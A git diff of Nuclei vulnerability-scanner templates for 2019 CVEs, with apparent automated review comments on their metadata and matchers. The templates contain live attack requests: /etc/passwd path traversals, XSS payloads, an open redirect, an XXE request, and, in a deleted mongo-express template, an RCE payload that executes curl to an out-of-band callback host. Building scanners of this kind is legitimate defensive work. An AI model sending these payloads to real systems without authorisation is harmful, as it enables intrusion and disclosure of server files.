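Review bot: The reference hunk of CVE-2019-7315.yaml replaces the NVD entry with `https://www.cvedetails.com/cve/CVE-2019-7315`, dropping the canonical source while the other templates touched in this commit keep or add their NVD link. Keep the NVD line and append the second one if it is wanted: `- https://nvd.nist.gov/vuln/detail/CVE-2019-7315` followed by `- https://www.cvedetails.com/cve/CVE-2019-7315`. The request and matchers of this template are outside the hunk, so the renamed title cannot be checked against them here.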
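Review bot: In CVE-2019-7543.yaml the second hunk changes `cvss-score: 6.1` to `cvss-score: 6.10`, which YAML reads as the same number but breaks the formatting every other updated template in this commit uses; the same trailing-zero form appears in the new cve-2019-1010287.yaml and cve-2019-11013.yaml. The hunk also moves `tags` above `classification`, and the context lines show the file still on `requests:` where the rest of the commit migrates to `http:`, so this file appears to be moving to an older layout rather than the current one. Keep `cvss-score: 6.1` and the `tags` placement the other templates use.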
@@ -21,12 +23,15 @@ requests: body: "content1=&button=%E6%8F%90%E4%BA%A4%E5%86%85%E5%AE%B9" headers: Content-Type: application/x-www-form-urlencoded + matchers-condition: and matchers: + - type: word words: - '' part: body + - type: word part: header words: diff --git a/nuclei-templates/CVE-2019/CVE-2019-8086.yaml b/nuclei-templates/CVE-2019/CVE-2019-8086.yaml index ca798672cc..6555a9c9be 100644 --- a/nuclei-templates/CVE-2019/CVE-2019-8086.yaml +++ b/nuclei-templates/CVE-2019/CVE-2019-8086.yaml 
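Review bot: The added `matchers-condition: and` in CVE-2019-7543.yaml now requires every matcher to hit, but the body matcher in the context lines reads `words: - ''`; if the file really contains an empty string rather than a payload lost to rendering here, that matcher matches every response and the condition adds no constraint. Confirm the word is the reflected payload the POST body on the earlier lines submits, and keep `part: body` on it. The header matcher's `words` list runs past the end of this hunk.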
@@ -1,27 +1,38 @@ id: CVE-2019-8086 info: - name: Adobe Experience Manager XXE + name: Adobe Experience Manager - XML External Entity Injection author: DhiyaneshDk severity: high - description: Adobe Experience Manager versions 6.5, 6.4, 6.3 and 6.2 have a xml external entity injection vulnerability. Successful exploitation could lead to sensitive information disclosure. + description: Adobe Experience Manager 6.5, 6.4, 6.3 and 6.2 are susceptible to XML external entity injection. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, server-side request forgery, and potential remote code execution. + remediation: | + Apply the necessary security patches provided by Adobe to mitigate the vulnerability. Additionally, ensure that the server is properly configured to restrict access to sensitive files and prevent XXE attacks. reference: - https://speakerdeck.com/0ang3el/a-hackers-perspective-on-aem-applications-security?slide=13 - https://github.com/0ang3el/aem-hacker/blob/master/aem_hacker.py - - https://nvd.nist.gov/vuln/detail/CVE-2019-8086 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2019-8086 + - https://nvd.nist.gov/vuln/detail/CVE-2019-8086 + - https://helpx.adobe.com/security/products/experience-manager/apsb19-48.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2019-8086 cwe-id: CWE-611 + epss-score: 0.13896 + epss-percentile: 0.95514 + cpe: cpe:2.3:a:adobe:experience_manager:6.2:*:*:*:*:*:*:* metadata: + max-request: 2 + vendor: adobe + product: experience_manager shodan-query: - http.title:"AEM Sign In" - http.component:"Adobe Experience Manager" tags: cve,cve2019,aem,adobe -requests: +http: - raw: - | POST /content/{{randstr}} HTTP/1.1 
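Review bot: The new `impact` text claims `server-side request forgery, and potential remote code execution`, which goes beyond the `classification` a few lines below (`C:H/I:N/A:N`, CWE-611) and beyond the description's information-disclosure wording; either trim the impact to what the vector supports or cite a source for the added integrity impact. The added `cpe` pins `experience_manager:6.2` only, while the description lists 6.5, 6.4, 6.3 and 6.2, so the metadata under-reports the affected range. Consider `impact: |` followed by `Successful exploitation can lead to disclosure of sensitive information from the server.` and a wildcard version in the CPE, or state that only one CPE is listed. The raw request body continues past the end of this hunk.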
@@ -31,7 +42,6 @@ requests: Referer: {{BaseURL}} sling:resourceType=fd/af/components/guideContainer - - | POST /content/{{randstr}}.af.internalsubmit.json HTTP/1.1 Host: {{Hostname}} @@ -56,3 +66,4 @@ requests: - type: status status: - 200 +# digest: 4a0a0047304502204f4724147e6b4fccd24a3a74c7d5d9ceb47aeacef3d0b7a842540575f9b1963e022100b096a744afe1978dd47f2cfbca79878b90892ee0ff6dacb1fefd99c6b253ddfc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2019/CVE-2019-8390.yaml b/nuclei-templates/CVE-2019/CVE-2019-8390.yaml index a869bfbd23..d063a60bba 100644 --- a/nuclei-templates/CVE-2019/CVE-2019-8390.yaml +++ b/nuclei-templates/CVE-2019/CVE-2019-8390.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | qdPM 9.1 suffers from Cross-site Scripting (XSS) in the search[keywords] parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to a patched version of qdPM or apply the necessary security patches provided by the vendor. reference: @@ -19,7 +21,7 @@ info: cve-id: CVE-2019-8390 cwe-id: CWE-79 epss-score: 0.0161 - epss-percentile: 0.86029 + epss-percentile: 0.86055 cpe: cpe:2.3:a:qdpm:qdpm:9.1:*:*:*:*:*:*:* metadata: verified: true @@ -73,4 +75,4 @@ http: - 'name="login\[_csrf_token\]" value="(.*?)"' internal: true part: body -# digest: 4a0a00473045022037a82fab22bc6f38ae948024efe9cb73f1118b72fa2a2582aa9d8a89220d5ab7022100eb140f8f9274b721d249bd801db0b78b6d2965574dfe71d1bda2700bcd8c5023:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e3a81b15258e85c407afba37c5e98425aecd7660c75135635414559f31097d82022046fc8312c4110e31e2cef362127368744f05d69b7564cffb7f03ef8b604a49cf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
diff --git a/nuclei-templates/CVE-2019/cve-2019-8446.yaml b/nuclei-templates/CVE-2019/CVE-2019-8446.yaml similarity index 100% rename from nuclei-templates/CVE-2019/cve-2019-8446.yaml rename to nuclei-templates/CVE-2019/CVE-2019-8446.yaml diff --git a/nuclei-templates/CVE-2019/CVE-2019-8449.yaml b/nuclei-templates/CVE-2019/CVE-2019-8449.yaml deleted file mode 100644 index df0921cbf3..0000000000 --- a/nuclei-templates/CVE-2019/CVE-2019-8449.yaml +++ /dev/null @@ -1,29 +0,0 @@ -id: CVE-2019-8449 -info: - name: JIRA Unauthenticated Sensitive Information Disclosure - author: harshbothra_ - severity: medium - description: The /rest/api/latest/groupuserpicker resource in Jira before version 8.4.0 allows remote attackers to enumerate usernames via an information disclosure vulnerability. - reference: - - https://www.doyler.net/security-not-included/more-jira-enumeration - - https://jira.atlassian.com/browse/JRASERVER-69796 - - http://packetstormsecurity.com/files/156172/Jira-8.3.4-Information-Disclosure.html - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.3 - cve-id: CVE-2019-8449 - cwe-id: CWE-306 - tags: cve,cve2019,atlassian,jira,disclosure -requests: - - method: GET - path: - - '{{BaseURL}}/rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true' - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - words: - - '{"users":{"users":' - part: body diff --git a/nuclei-templates/CVE-2019/cve-2019-8451.yaml b/nuclei-templates/CVE-2019/CVE-2019-8451.yaml similarity index 100% rename from nuclei-templates/CVE-2019/cve-2019-8451.yaml rename to nuclei-templates/CVE-2019/CVE-2019-8451.yaml diff --git a/nuclei-templates/CVE-2019/cve-2019-8903.yaml b/nuclei-templates/CVE-2019/CVE-2019-8903.yaml similarity index 100% rename from nuclei-templates/CVE-2019/cve-2019-8903.yaml rename to nuclei-templates/CVE-2019/CVE-2019-8903.yaml 
diff --git a/nuclei-templates/CVE-2019/CVE-2019-9915.yaml b/nuclei-templates/CVE-2019/CVE-2019-9915.yaml new file mode 100644 index 0000000000..0127935998 --- /dev/null +++ b/nuclei-templates/CVE-2019/CVE-2019-9915.yaml @@ -0,0 +1,32 @@ +id: CVE-2019-9915 +info: + name: GetSimpleCMS 3.3.13 - Open Redirection + author: 0x_Akoko + severity: medium + description: GetSimpleCMS 3.3.13 has an Open Redirect via the admin/index.php redirect parameter. + reference: + - https://www.invicti.com/web-applications-advisories/ns-18-056-open-redirection-vulnerability-in-getsimplecms + - https://github.com/GetSimpleCMS/GetSimpleCMS/issues/1300 + - https://www.cvedetails.com/cve/CVE-2019-9915 + - https://www.netsparker.com/web-applications-advisories/ns-18-056-open-redirection-vulnerability-in-getsimplecms/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2019-9915 + cwe-id: CWE-601 + metadata: + verified: "true" + tags: cve,cve2019,redirect,getsimple,cms +requests: + - raw: + - | + POST /admin/index.php?redirect=https://interact.sh/ HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + userid={{username}}&pwd={{password}}&submitted=Login + matchers: + - type: regex + part: header + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/' # https://regex101.com/r/ZDYhFh/1 diff --git a/nuclei-templates/CVE-2019/CVE-2019-9922.yaml b/nuclei-templates/CVE-2019/CVE-2019-9922.yaml new file mode 100644 index 0000000000..c8af51903f --- /dev/null +++ b/nuclei-templates/CVE-2019/CVE-2019-9922.yaml 
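Review bot: The raw request in the new CVE-2019-9915.yaml posts `userid={{username}}&pwd={{password}}`, but the template defines no `variables:` block for them, so unless they are supplied at scan time the login body goes out with unresolved or empty values; if the redirect is only issued after a successful login, the `Location` matcher will presumably never fire. Either document that `username` and `password` must be passed by the operator, or, if the redirect happens regardless of the credentials, say so in the description. The metadata also uses `verified: "true"` (a quoted string) where the rest of the commit writes `verified: true`, and the first and fourth references point at the same advisory under the invicti and netsparker hostnames.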
@@ -0,0 +1,28 @@ +id: CVE-2019-9922 +info: + name: JE Messenger 1.2.2 Joomla - Directory Traversal + author: 0x_Akoko + severity: high + description: An issue was discovered in the Harmis JE Messenger component 1.2.2 for Joomla. Directory Traversal allows read access to arbitrary files. + reference: + - https://github.com/azd-cert/CVE/blob/master/CVEs/CVE-2019-9922.md + - https://www.cvedetails.com/cve/CVE-2019-9922 + - https://extensions.joomla.org/extension/je-messenger/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2019-9922 + cwe-id: CWE-22 + tags: cve,cve2019,joomla,messenger,lfi +requests: + - method: GET + path: + - "{{BaseURL}}/index.php/component/jemessenger/box_details?task=download&dw_file=../../.././../../../etc/passwd" + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[x*]:0:0" + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2019/CVE-2019-10068.yaml b/nuclei-templates/CVE-2019/cve-2019-10068.yaml similarity index 100% rename from nuclei-templates/CVE-2019/CVE-2019-10068.yaml rename to nuclei-templates/CVE-2019/cve-2019-10068.yaml diff --git a/nuclei-templates/CVE-2019/cve-2019-1010287.yaml b/nuclei-templates/CVE-2019/cve-2019-1010287.yaml new file mode 100644 index 0000000000..02fb5c9607 --- /dev/null +++ b/nuclei-templates/CVE-2019/cve-2019-1010287.yaml 
@@ -0,0 +1,38 @@ +id: CVE-2019-1010287 + +info: + name: Timesheet 1.5.3 - Cross Site Scripting + author: pikpikcu + severity: medium + description: "Timesheet Next Gen 1.5.3 and earlier is affected by: Cross Site Scripting (XSS). The impact is: Allows an attacker to execute arbitrary HTML and JavaScript code via a \"redirect\" parameter. The component is: Web login form: login.php, lines 40 and 54. The attack vector is: reflected XSS, victim may click the malicious url." + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2019-1010287 + - http://www.mdh-tz.info/ # demo + tags: cve,cve2019,timesheet,xss + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2019-1010287 + cwe-id: CWE-79 + metadata: + google-dork: inurl:"/timesheet/login.php" + +requests: + - raw: + - | + POST /timesheet/login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + username=%27%22%3E%3Cscript%3Ejavascript%3Aalert%28document.domain%29%3C%2Fscript%3E&password=pd&submit=Login + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - '>' + part: body diff --git a/nuclei-templates/CVE-2019/cve-2019-10717.yaml b/nuclei-templates/CVE-2019/cve-2019-10717.yaml new file mode 100644 index 0000000000..a69c522e03 --- /dev/null +++ b/nuclei-templates/CVE-2019/cve-2019-10717.yaml 
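Review bot: The description in the new cve-2019-1010287.yaml says the injection is `via a "redirect" parameter`, but the raw request places the payload in the `username` field of the login POST and never sends a `redirect` parameter, so either the request or the description is wrong; please check the referenced advisory and align them. The body matcher is shown here as `- '>'`, which would match almost any HTML page; if that is not a rendering artifact it needs the actual reflected string, e.g. the `alert(document.domain)` text from the request. `cvss-score: 6.10` should be `6.1` as elsewhere in the commit.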
@@ -0,0 +1,54 @@ +id: CVE-2019-10717 + +info: + name: BlogEngine.NET 3.3.7.0 - Local File Inclusion + author: arafatansari + severity: high + description: | + BlogEngine.NET 3.3.7.0 allows /api/filemanager local file inclusion via the path parameter + impact: | + An attacker can exploit this vulnerability to read sensitive files, execute arbitrary code, or launch further attacks. + remediation: | + Upgrade to a patched version of BlogEngine.NET or apply the vendor-supplied patch to mitigate this vulnerability. + reference: + - https://www.securitymetrics.com/blog/Blogenginenet-Directory-Traversal-Listing-Login-Page-Unvalidated-Redirect + - https://github.com/rxtur/BlogEngine.NET/commits/master + - https://nvd.nist.gov/vuln/detail/CVE-2019-10717 + - http://seclists.org/fulldisclosure/2019/Jun/44 + - https://github.com/ARPSyndicate/kenzer-templates + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N + cvss-score: 7.1 + cve-id: CVE-2019-10717 + cwe-id: CWE-22 + epss-score: 0.00409 + epss-percentile: 0.712 + cpe: cpe:2.3:a:dotnetblogengine:blogengine.net:3.3.7.0:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: dotnetblogengine + product: blogengine.net + shodan-query: http.html:"Blogengine.net" + tags: cve,cve2019,seclists,blogengine,lfi,traversal,dotnetblogengine + +http: + - method: GET + path: + - "{{BaseURL}}/api/filemanager?path=%2F..%2f..%2fContent" + + matchers-condition: and + matchers: + - type: word + part: header + words: + - "application/json" + + - type: regex + regex: + - '~/App_Data/files/../../([a-zA-Z0-9\.\-]+)/([a-z0-9]+)' + + - type: status + status: + - 200 +# digest: 4a0a00473045022100e9835e960c185d264844ff6a1c0dcc4461f0848d00e894bb0681a656b4939db90220223530414a1d116e03bae637ebc7a0b6037ac08c0f2daee019cd5fc664d2e36f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
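Review bot: In the regex matcher of the new cve-2019-10717.yaml, `'~/App_Data/files/../../([a-zA-Z0-9\.\-]+)/([a-z0-9]+)'` leaves the dots unescaped, so `..` matches any two characters and the pattern is looser than the traversal string it is meant to confirm; write it as `'~/App_Data/files/\.\./\.\./([a-zA-Z0-9\.\-]+)/([a-z0-9]+)'`. The classification declares `PR:L` while the GET carries no authentication, so if the endpoint does require a session the `verified: true` claim should say under which conditions it was verified. This commit also renames files in both directions (`cve-2019-8446` to `CVE-2019-8446`, `CVE-2019-10068` to `cve-2019-10068`) and adds this one with the lowercase prefix, so the casing convention should be settled once.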
diff --git a/nuclei-templates/CVE-2019/cve-2019-10758.yaml b/nuclei-templates/CVE-2019/cve-2019-10758.yaml deleted file mode 100644 index 9ce3a78eca..0000000000 --- a/nuclei-templates/CVE-2019/cve-2019-10758.yaml +++ /dev/null @@ -1,35 +0,0 @@ -id: CVE-2019-10758 - -info: - name: mongo-express Remote Code Execution - author: princechaddha - severity: critical - description: "mongo-express before 0.54.0 is vulnerable to remote code execution via endpoints that uses the `toBSON` method and misuse the `vm` dependency to perform `exec` commands in a non-safe environment." - reference: - - https://github.com/vulhub/vulhub/tree/master/mongo-express/CVE-2019-10758 - - https://nvd.nist.gov/vuln/detail/CVE-2019-10758 - remediation: Upgrade mongo-express to version 0.54.0 or higher. - metadata: - shodan-query: http.title:"Mongo Express" - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H - cvss-score: 9.90 - cve-id: CVE-2019-10758 - tags: cve,cve2019,mongo,mongo-express - -requests: - - raw: - - | - POST /checkValid HTTP/1.1 - Host: {{Hostname}} - Authorization: Basic YWRtaW46cGFzcw== - Content-Type: application/x-www-form-urlencoded - - document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("curl http://{{interactsh-url}}") - matchers: - - type: word - part: interactsh_protocol # Confirms the HTTP Interaction - words: - - "http" - -# Enhanced by mp on 2022/03/29 diff --git a/nuclei-templates/CVE-2019/cve-2019-11013.yaml b/nuclei-templates/CVE-2019/cve-2019-11013.yaml new file mode 100644 index 0000000000..d5cbcb989d --- /dev/null +++ b/nuclei-templates/CVE-2019/cve-2019-11013.yaml 
@@ -0,0 +1,32 @@ +id: CVE-2019-11013 + +info: + name: Nimble Streamer 3.0.2-2 to 3.5.4-9 - Path Traversal + author: 0x_Akoko + severity: medium + reference: + - https://www.exploit-db.com/exploits/47301 + - https://nvd.nist.gov/vuln/detail/CVE-2019-11013 + tags: cve,cve2019,lfi,nimble + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N + cvss-score: 6.50 + cve-id: CVE-2019-11013 + cwe-id: CWE-22 + description: "Nimble Streamer 3.0.2-2 through 3.5.4-9 has a ../ directory traversal vulnerability. Successful exploitation could allow an attacker to traverse the file system to access files or directories that are outside of the restricted directory on the remote server." + +requests: + - method: GET + path: + - "{{BaseURL}}/demo/file/../../../../../../../../etc/passwd%00filename.mp4/chunk.m3u8?nimblesessionid=1484448" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2019/cve-2019-11043.yaml b/nuclei-templates/CVE-2019/cve-2019-11043.yaml deleted file mode 100644 index 994593963e..0000000000 --- a/nuclei-templates/CVE-2019/cve-2019-11043.yaml +++ /dev/null @@ -1,21 +0,0 @@ -id: CVE-2019-11043 - -info: - name: PHP RCE - author: medbsq - severity: critical - # link: https://testbnull.medium.com/weblogic-rce-by-only-one-get-request-cve-2020-14882-analysis-6e4b09981dbf - - -requests: - - method: GET - path: - - "{{BaseURL}}//?a=/bin/sh+-c+'which+which'&" - headers: - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 - - matchers: - - type: word - words: - - "/bin/which" - part: body \ No newline at end of file diff --git a/nuclei-templates/CVE-2019/cve-2019-11370.yaml b/nuclei-templates/CVE-2019/cve-2019-11370.yaml index c2f5e3f80f..0d2b1b1d75 100644 --- a/nuclei-templates/CVE-2019/cve-2019-11370.yaml +++ b/nuclei-templates/CVE-2019/cve-2019-11370.yaml 
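Review bot: The GET in the new cve-2019-11013.yaml hard-codes `nimblesessionid=1484448`; a session value copied from the exploit-db write-up is unlikely to be valid on another host, and the classification marks the issue `PR:L`, so if the server checks the session the request presumably never reaches the traversal and the template silently yields nothing. Either document where the value must come from or note that the parameter is not validated, whichever the referenced advisory supports. Style: `description` sits after `classification` while every other template here keeps it under `severity`, and `cvss-score: 6.50` should be `6.5`.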
@@ -6,21 +6,32 @@ info: severity: medium description: | Carel pCOWeb prior to B1.2.4 is vulnerable to stored cross-site scripting, as demonstrated by the config/pw_snmp.html "System contact" field. + impact: | + Allows attackers to inject malicious scripts into web pages viewed by users, leading to potential data theft or unauthorized actions. + remediation: | + Apply the latest patch or upgrade to a version that addresses the vulnerability. reference: - https://www.exploit-db.com/exploits/46897 - https://github.com/nepenthe0320/cve_poc/blob/master/CVE-2019-11370 - https://nvd.nist.gov/vuln/detail/CVE-2019-11370 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 cve-id: CVE-2019-11370 cwe-id: CWE-79 + epss-score: 0.1896 + epss-percentile: 0.96129 + cpe: cpe:2.3:o:carel:pcoweb_card_firmware:*:*:*:*:*:*:*:* metadata: + verified: true + max-request: 2 + vendor: carel + product: pcoweb_card_firmware shodan-query: http.html:"pCOWeb" - verified: "true" - tags: pcoweb,xss,carel,edb,cve,cve2019 + tags: cve,cve2019,pcoweb,xss,carel,edb -requests: +http: - raw: - | POST /config/pw_snmp_done.html HTTP/1.1 @@ -28,12 +39,10 @@ requests: Content-Type: application/x-www-form-urlencoded %3Fscript%3Asetdb%28%27snmp%27%2C%27syscontact%27%29=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E - - | GET /config/pw_snmp.html HTTP/1.1 Host: {{Hostname}} - req-condition: true matchers: - type: dsl dsl: @@ -41,5 +50,4 @@ requests: - status_code_2 == 200 - contains(body_2, 'value=\"\">\">') condition: and - -# Enhanced by mp on 2022/08/08 +# digest: 4a0a0047304502206211cfa838795769776a00d7ccfcedaa1fe50255fc01e8f945c461b0d2ebc946022100f37746cb8f51e8f7d78c8730d26614a8b2ffc9a7d999c013d5b875cf3568d608:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
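Review bot: The second hunk of cve-2019-11370.yaml deletes `req-condition: true` while the DSL matcher still references `status_code_2` and `body_2` from the second raw request; if the target engine does not infer the multi-request condition from the `_2` suffix, the DSL is evaluated against the first response only and the template never matches, so the minimum engine version should be stated alongside the new `max-request: 2`. The new `impact` and `remediation` blocks are generic; `remediation: |` followed by `Upgrade pCOWeb to B1.2.4 or later.` would match the version the description already gives. The DSL list continues past the end of this hunk.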
diff --git a/nuclei-templates/CVE-2019/CVE-2019-12461.yaml b/nuclei-templates/CVE-2019/cve-2019-12461.yaml similarity index 100% rename from nuclei-templates/CVE-2019/CVE-2019-12461.yaml rename to nuclei-templates/CVE-2019/cve-2019-12461.yaml diff --git a/nuclei-templates/CVE-2019/cve-2019-12581.yaml b/nuclei-templates/CVE-2019/cve-2019-12581.yaml new file mode 100644 index 0000000000..327f88b08f --- /dev/null +++ b/nuclei-templates/CVE-2019/cve-2019-12581.yaml 
@@ -0,0 +1,55 @@ +id: CVE-2019-12581 + +info: + name: Zyxel ZyWal/USG/UAG Devices - Cross-Site Scripting + author: n-thumann + severity: medium + description: Zyxel ZyWall, USG, and UAG devices allow remote attackers to inject arbitrary web script or HTML via the err_msg parameter free_time_failed.cgi CGI program, aka reflective cross-site scripting. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. + remediation: | + Apply the latest firmware update provided by Zyxel to fix the XSS vulnerability. + reference: + - https://www.zyxel.com/support/vulnerabilities-related-to-the-Free-Time-feature.shtml + - https://sec-consult.com/vulnerability-lab/advisory/reflected-cross-site-scripting-in-zxel-zywall/ + - https://n-thumann.de/blog/zyxel-gateways-missing-access-control-in-account-generator-xss/ + - https://nvd.nist.gov/vuln/detail/CVE-2019-12581 + - https://www.zyxel.com/us/en/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2019-12581 + cwe-id: CWE-79 + epss-score: 0.00642 + epss-percentile: 0.7705 + cpe: cpe:2.3:o:zyxel:uag2100_firmware:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: zyxel + product: uag2100_firmware + shodan-query: http.title:"ZyWall" + tags: cve,cve2019,zyxel,zywall,xss + +http: + - method: GET + path: + - "{{BaseURL}}/free_time_failed.cgi?err_msg=" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "" + - "Please contact with administrator." + condition: and + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 +# digest: 490a0046304402202bbcd24325d27b4afa9692a47676116c3e746dac9efb6781eca7200bedd46d5c02203e77b6aa27e9da81a381ac8a93047e7dfe379956ebf9a6b0196e58a7150cb1a7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
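Review bot: The body matcher's first `words` entry is the empty string `""` as this hunk renders (and `err_msg=` in `path` is likewise empty), and an empty word matches every body, so with `condition: and` the check collapses to the static `Please contact with administrator.` text plus a 200 `text/html` response — any device serving that error page would be reported whether or not `err_msg` is reflected. If an HTML tag was stripped from both places during rendering, restore it; otherwise send a unique harmless marker in `err_msg` and match that same marker in `words`, which is what actually proves reflection. `name` also spells the product `ZyWal` while `description` and the tags use `ZyWall`.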
diff --git a/nuclei-templates/CVE-2019/cve-2019-12583.yaml b/nuclei-templates/CVE-2019/cve-2019-12583.yaml index dea4b3429c..3f62ff75c8 100644 --- a/nuclei-templates/CVE-2019/cve-2019-12583.yaml +++ b/nuclei-templates/CVE-2019/cve-2019-12583.yaml @@ -5,19 +5,31 @@ info: author: n-thumann,daffainfo severity: critical description: Zyxel UAG, USG, and ZyWall devices allows a remote attacker to generate guest accounts by directly accessing the account generator via the "Free Time" component. This can lead to unauthorized network access or DoS attacks. + impact: | + An attacker can exploit this vulnerability to create unauthorized accounts with administrative privileges. + remediation: | + Apply the latest firmware update provided by Zyxel to fix the vulnerability. reference: - https://www.zyxel.com/support/vulnerabilities-related-to-the-Free-Time-feature.shtml - https://n-thumann.de/blog/zyxel-gateways-missing-access-control-in-account-generator-xss/ - https://nvd.nist.gov/vuln/detail/CVE-2019-12583 + - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/StarCrossPortal/scalpel classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H cvss-score: 9.1 cve-id: CVE-2019-12583 cwe-id: CWE-425 - tags: cve,cve2019,zyxel,zywall + epss-score: 0.00481 + epss-percentile: 0.75389 + cpe: cpe:2.3:o:zyxel:uag2100_firmware:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: zyxel + product: uag2100_firmware + tags: cve,cve2019,zyxel,zywall,xss - -requests: +http: - method: GET path: - "{{BaseURL}}/free_time.cgi" @@ -34,5 +46,4 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/06/01 +# digest: 4b0a00483046022100a12874f0ef2733bc8c7f0e764fb0ca6289dcb56f72499b238b27b09caf888bb8022100db48c204ba56cf97ad35c36b148a21decd86e83cd35614cb546190faea932e61:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
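Review bot: The `tags` line gains `xss`, but this template requests `free_time.cgi` to reach the unauthenticated account generator (`cwe-id: CWE-425`) and has no XSS payload or reflection matcher — the XSS is cve-2019-12581, added in this same commit — so keep `tags: cve,cve2019,zyxel,zywall`. The new `impact` text claims accounts "with administrative privileges", whereas `description` (and the CVE) speak of guest accounts; `impact: An unauthenticated attacker can generate guest accounts, gaining network access or exhausting the guest-account pool (denial of service).` The second hunk only swaps the trailing comment for the digest line.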
diff --git a/nuclei-templates/CVE-2019/cve-2019-12616.yaml b/nuclei-templates/CVE-2019/cve-2019-12616.yaml new file mode 100644 index 0000000000..6d8e56152d --- /dev/null +++ b/nuclei-templates/CVE-2019/cve-2019-12616.yaml @@ -0,0 +1,39 @@ +id: CVE-2019-12616 + +info: + name: phpMyAdmin CSRF + author: Mohammedsaneem,philippedelteil + description: A vulnerability was found that allows an attacker to trigger a CSRF attack against a phpMyAdmin user. The attacker can trick the user, for instance through a broken tag pointing at the victim's phpMyAdmin database, and the attacker can potentially deliver a payload (such as a specific INSERT or DELETE statement) through the victim. + severity: medium + tags: cve,cve2019,phpmyadmin,csrf + reference: + - https://www.phpmyadmin.net/security/PMASA-2019-4/ + - https://www.exploit-db.com/exploits/46982 + - https://nvd.nist.gov/vuln/detail/CVE-2019-12616 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N + cvss-score: 6.50 + cve-id: CVE-2019-12616 + cwe-id: CWE-352 + +requests: + - method: GET + path: + - "{{BaseURL}}/phpmyadmin/" + + matchers-condition: and + matchers: + - type: word + words: + - "phpmyadmin.net" + - "phpMyAdmin" + condition: or + + - type: regex + regex: + - 'v=[1-4]\.[0-8]\.' # Fix in 4.9.0 + + - type: status + status: + - 200 + - 401 # password protected diff --git a/nuclei-templates/CVE-2019/cve-2019-12962.yaml b/nuclei-templates/CVE-2019/cve-2019-12962.yaml new file mode 100644 index 0000000000..32221d9467 --- /dev/null +++ b/nuclei-templates/CVE-2019/cve-2019-12962.yaml 
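Review bot: This new template keeps the pre-v3 `requests:` key while the templates this commit modifies (cve-2019-11370, cve-2019-12583, cve-2019-20224) are moved to `http:`, and it has none of the `impact`, `remediation` or `metadata`/`max-request` entries the commit's other new files carry. The check itself is a version fingerprint — the phpMyAdmin name plus `v=[1-4]\.[0-8]\.` taken from an asset URL, with 401 accepted as "password protected" — not an exercise of the CSRF, and `description` should say so, e.g. append `This template fingerprints phpMyAdmin versions before 4.9.0 from the asset version string; it does not test the CSRF itself.`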
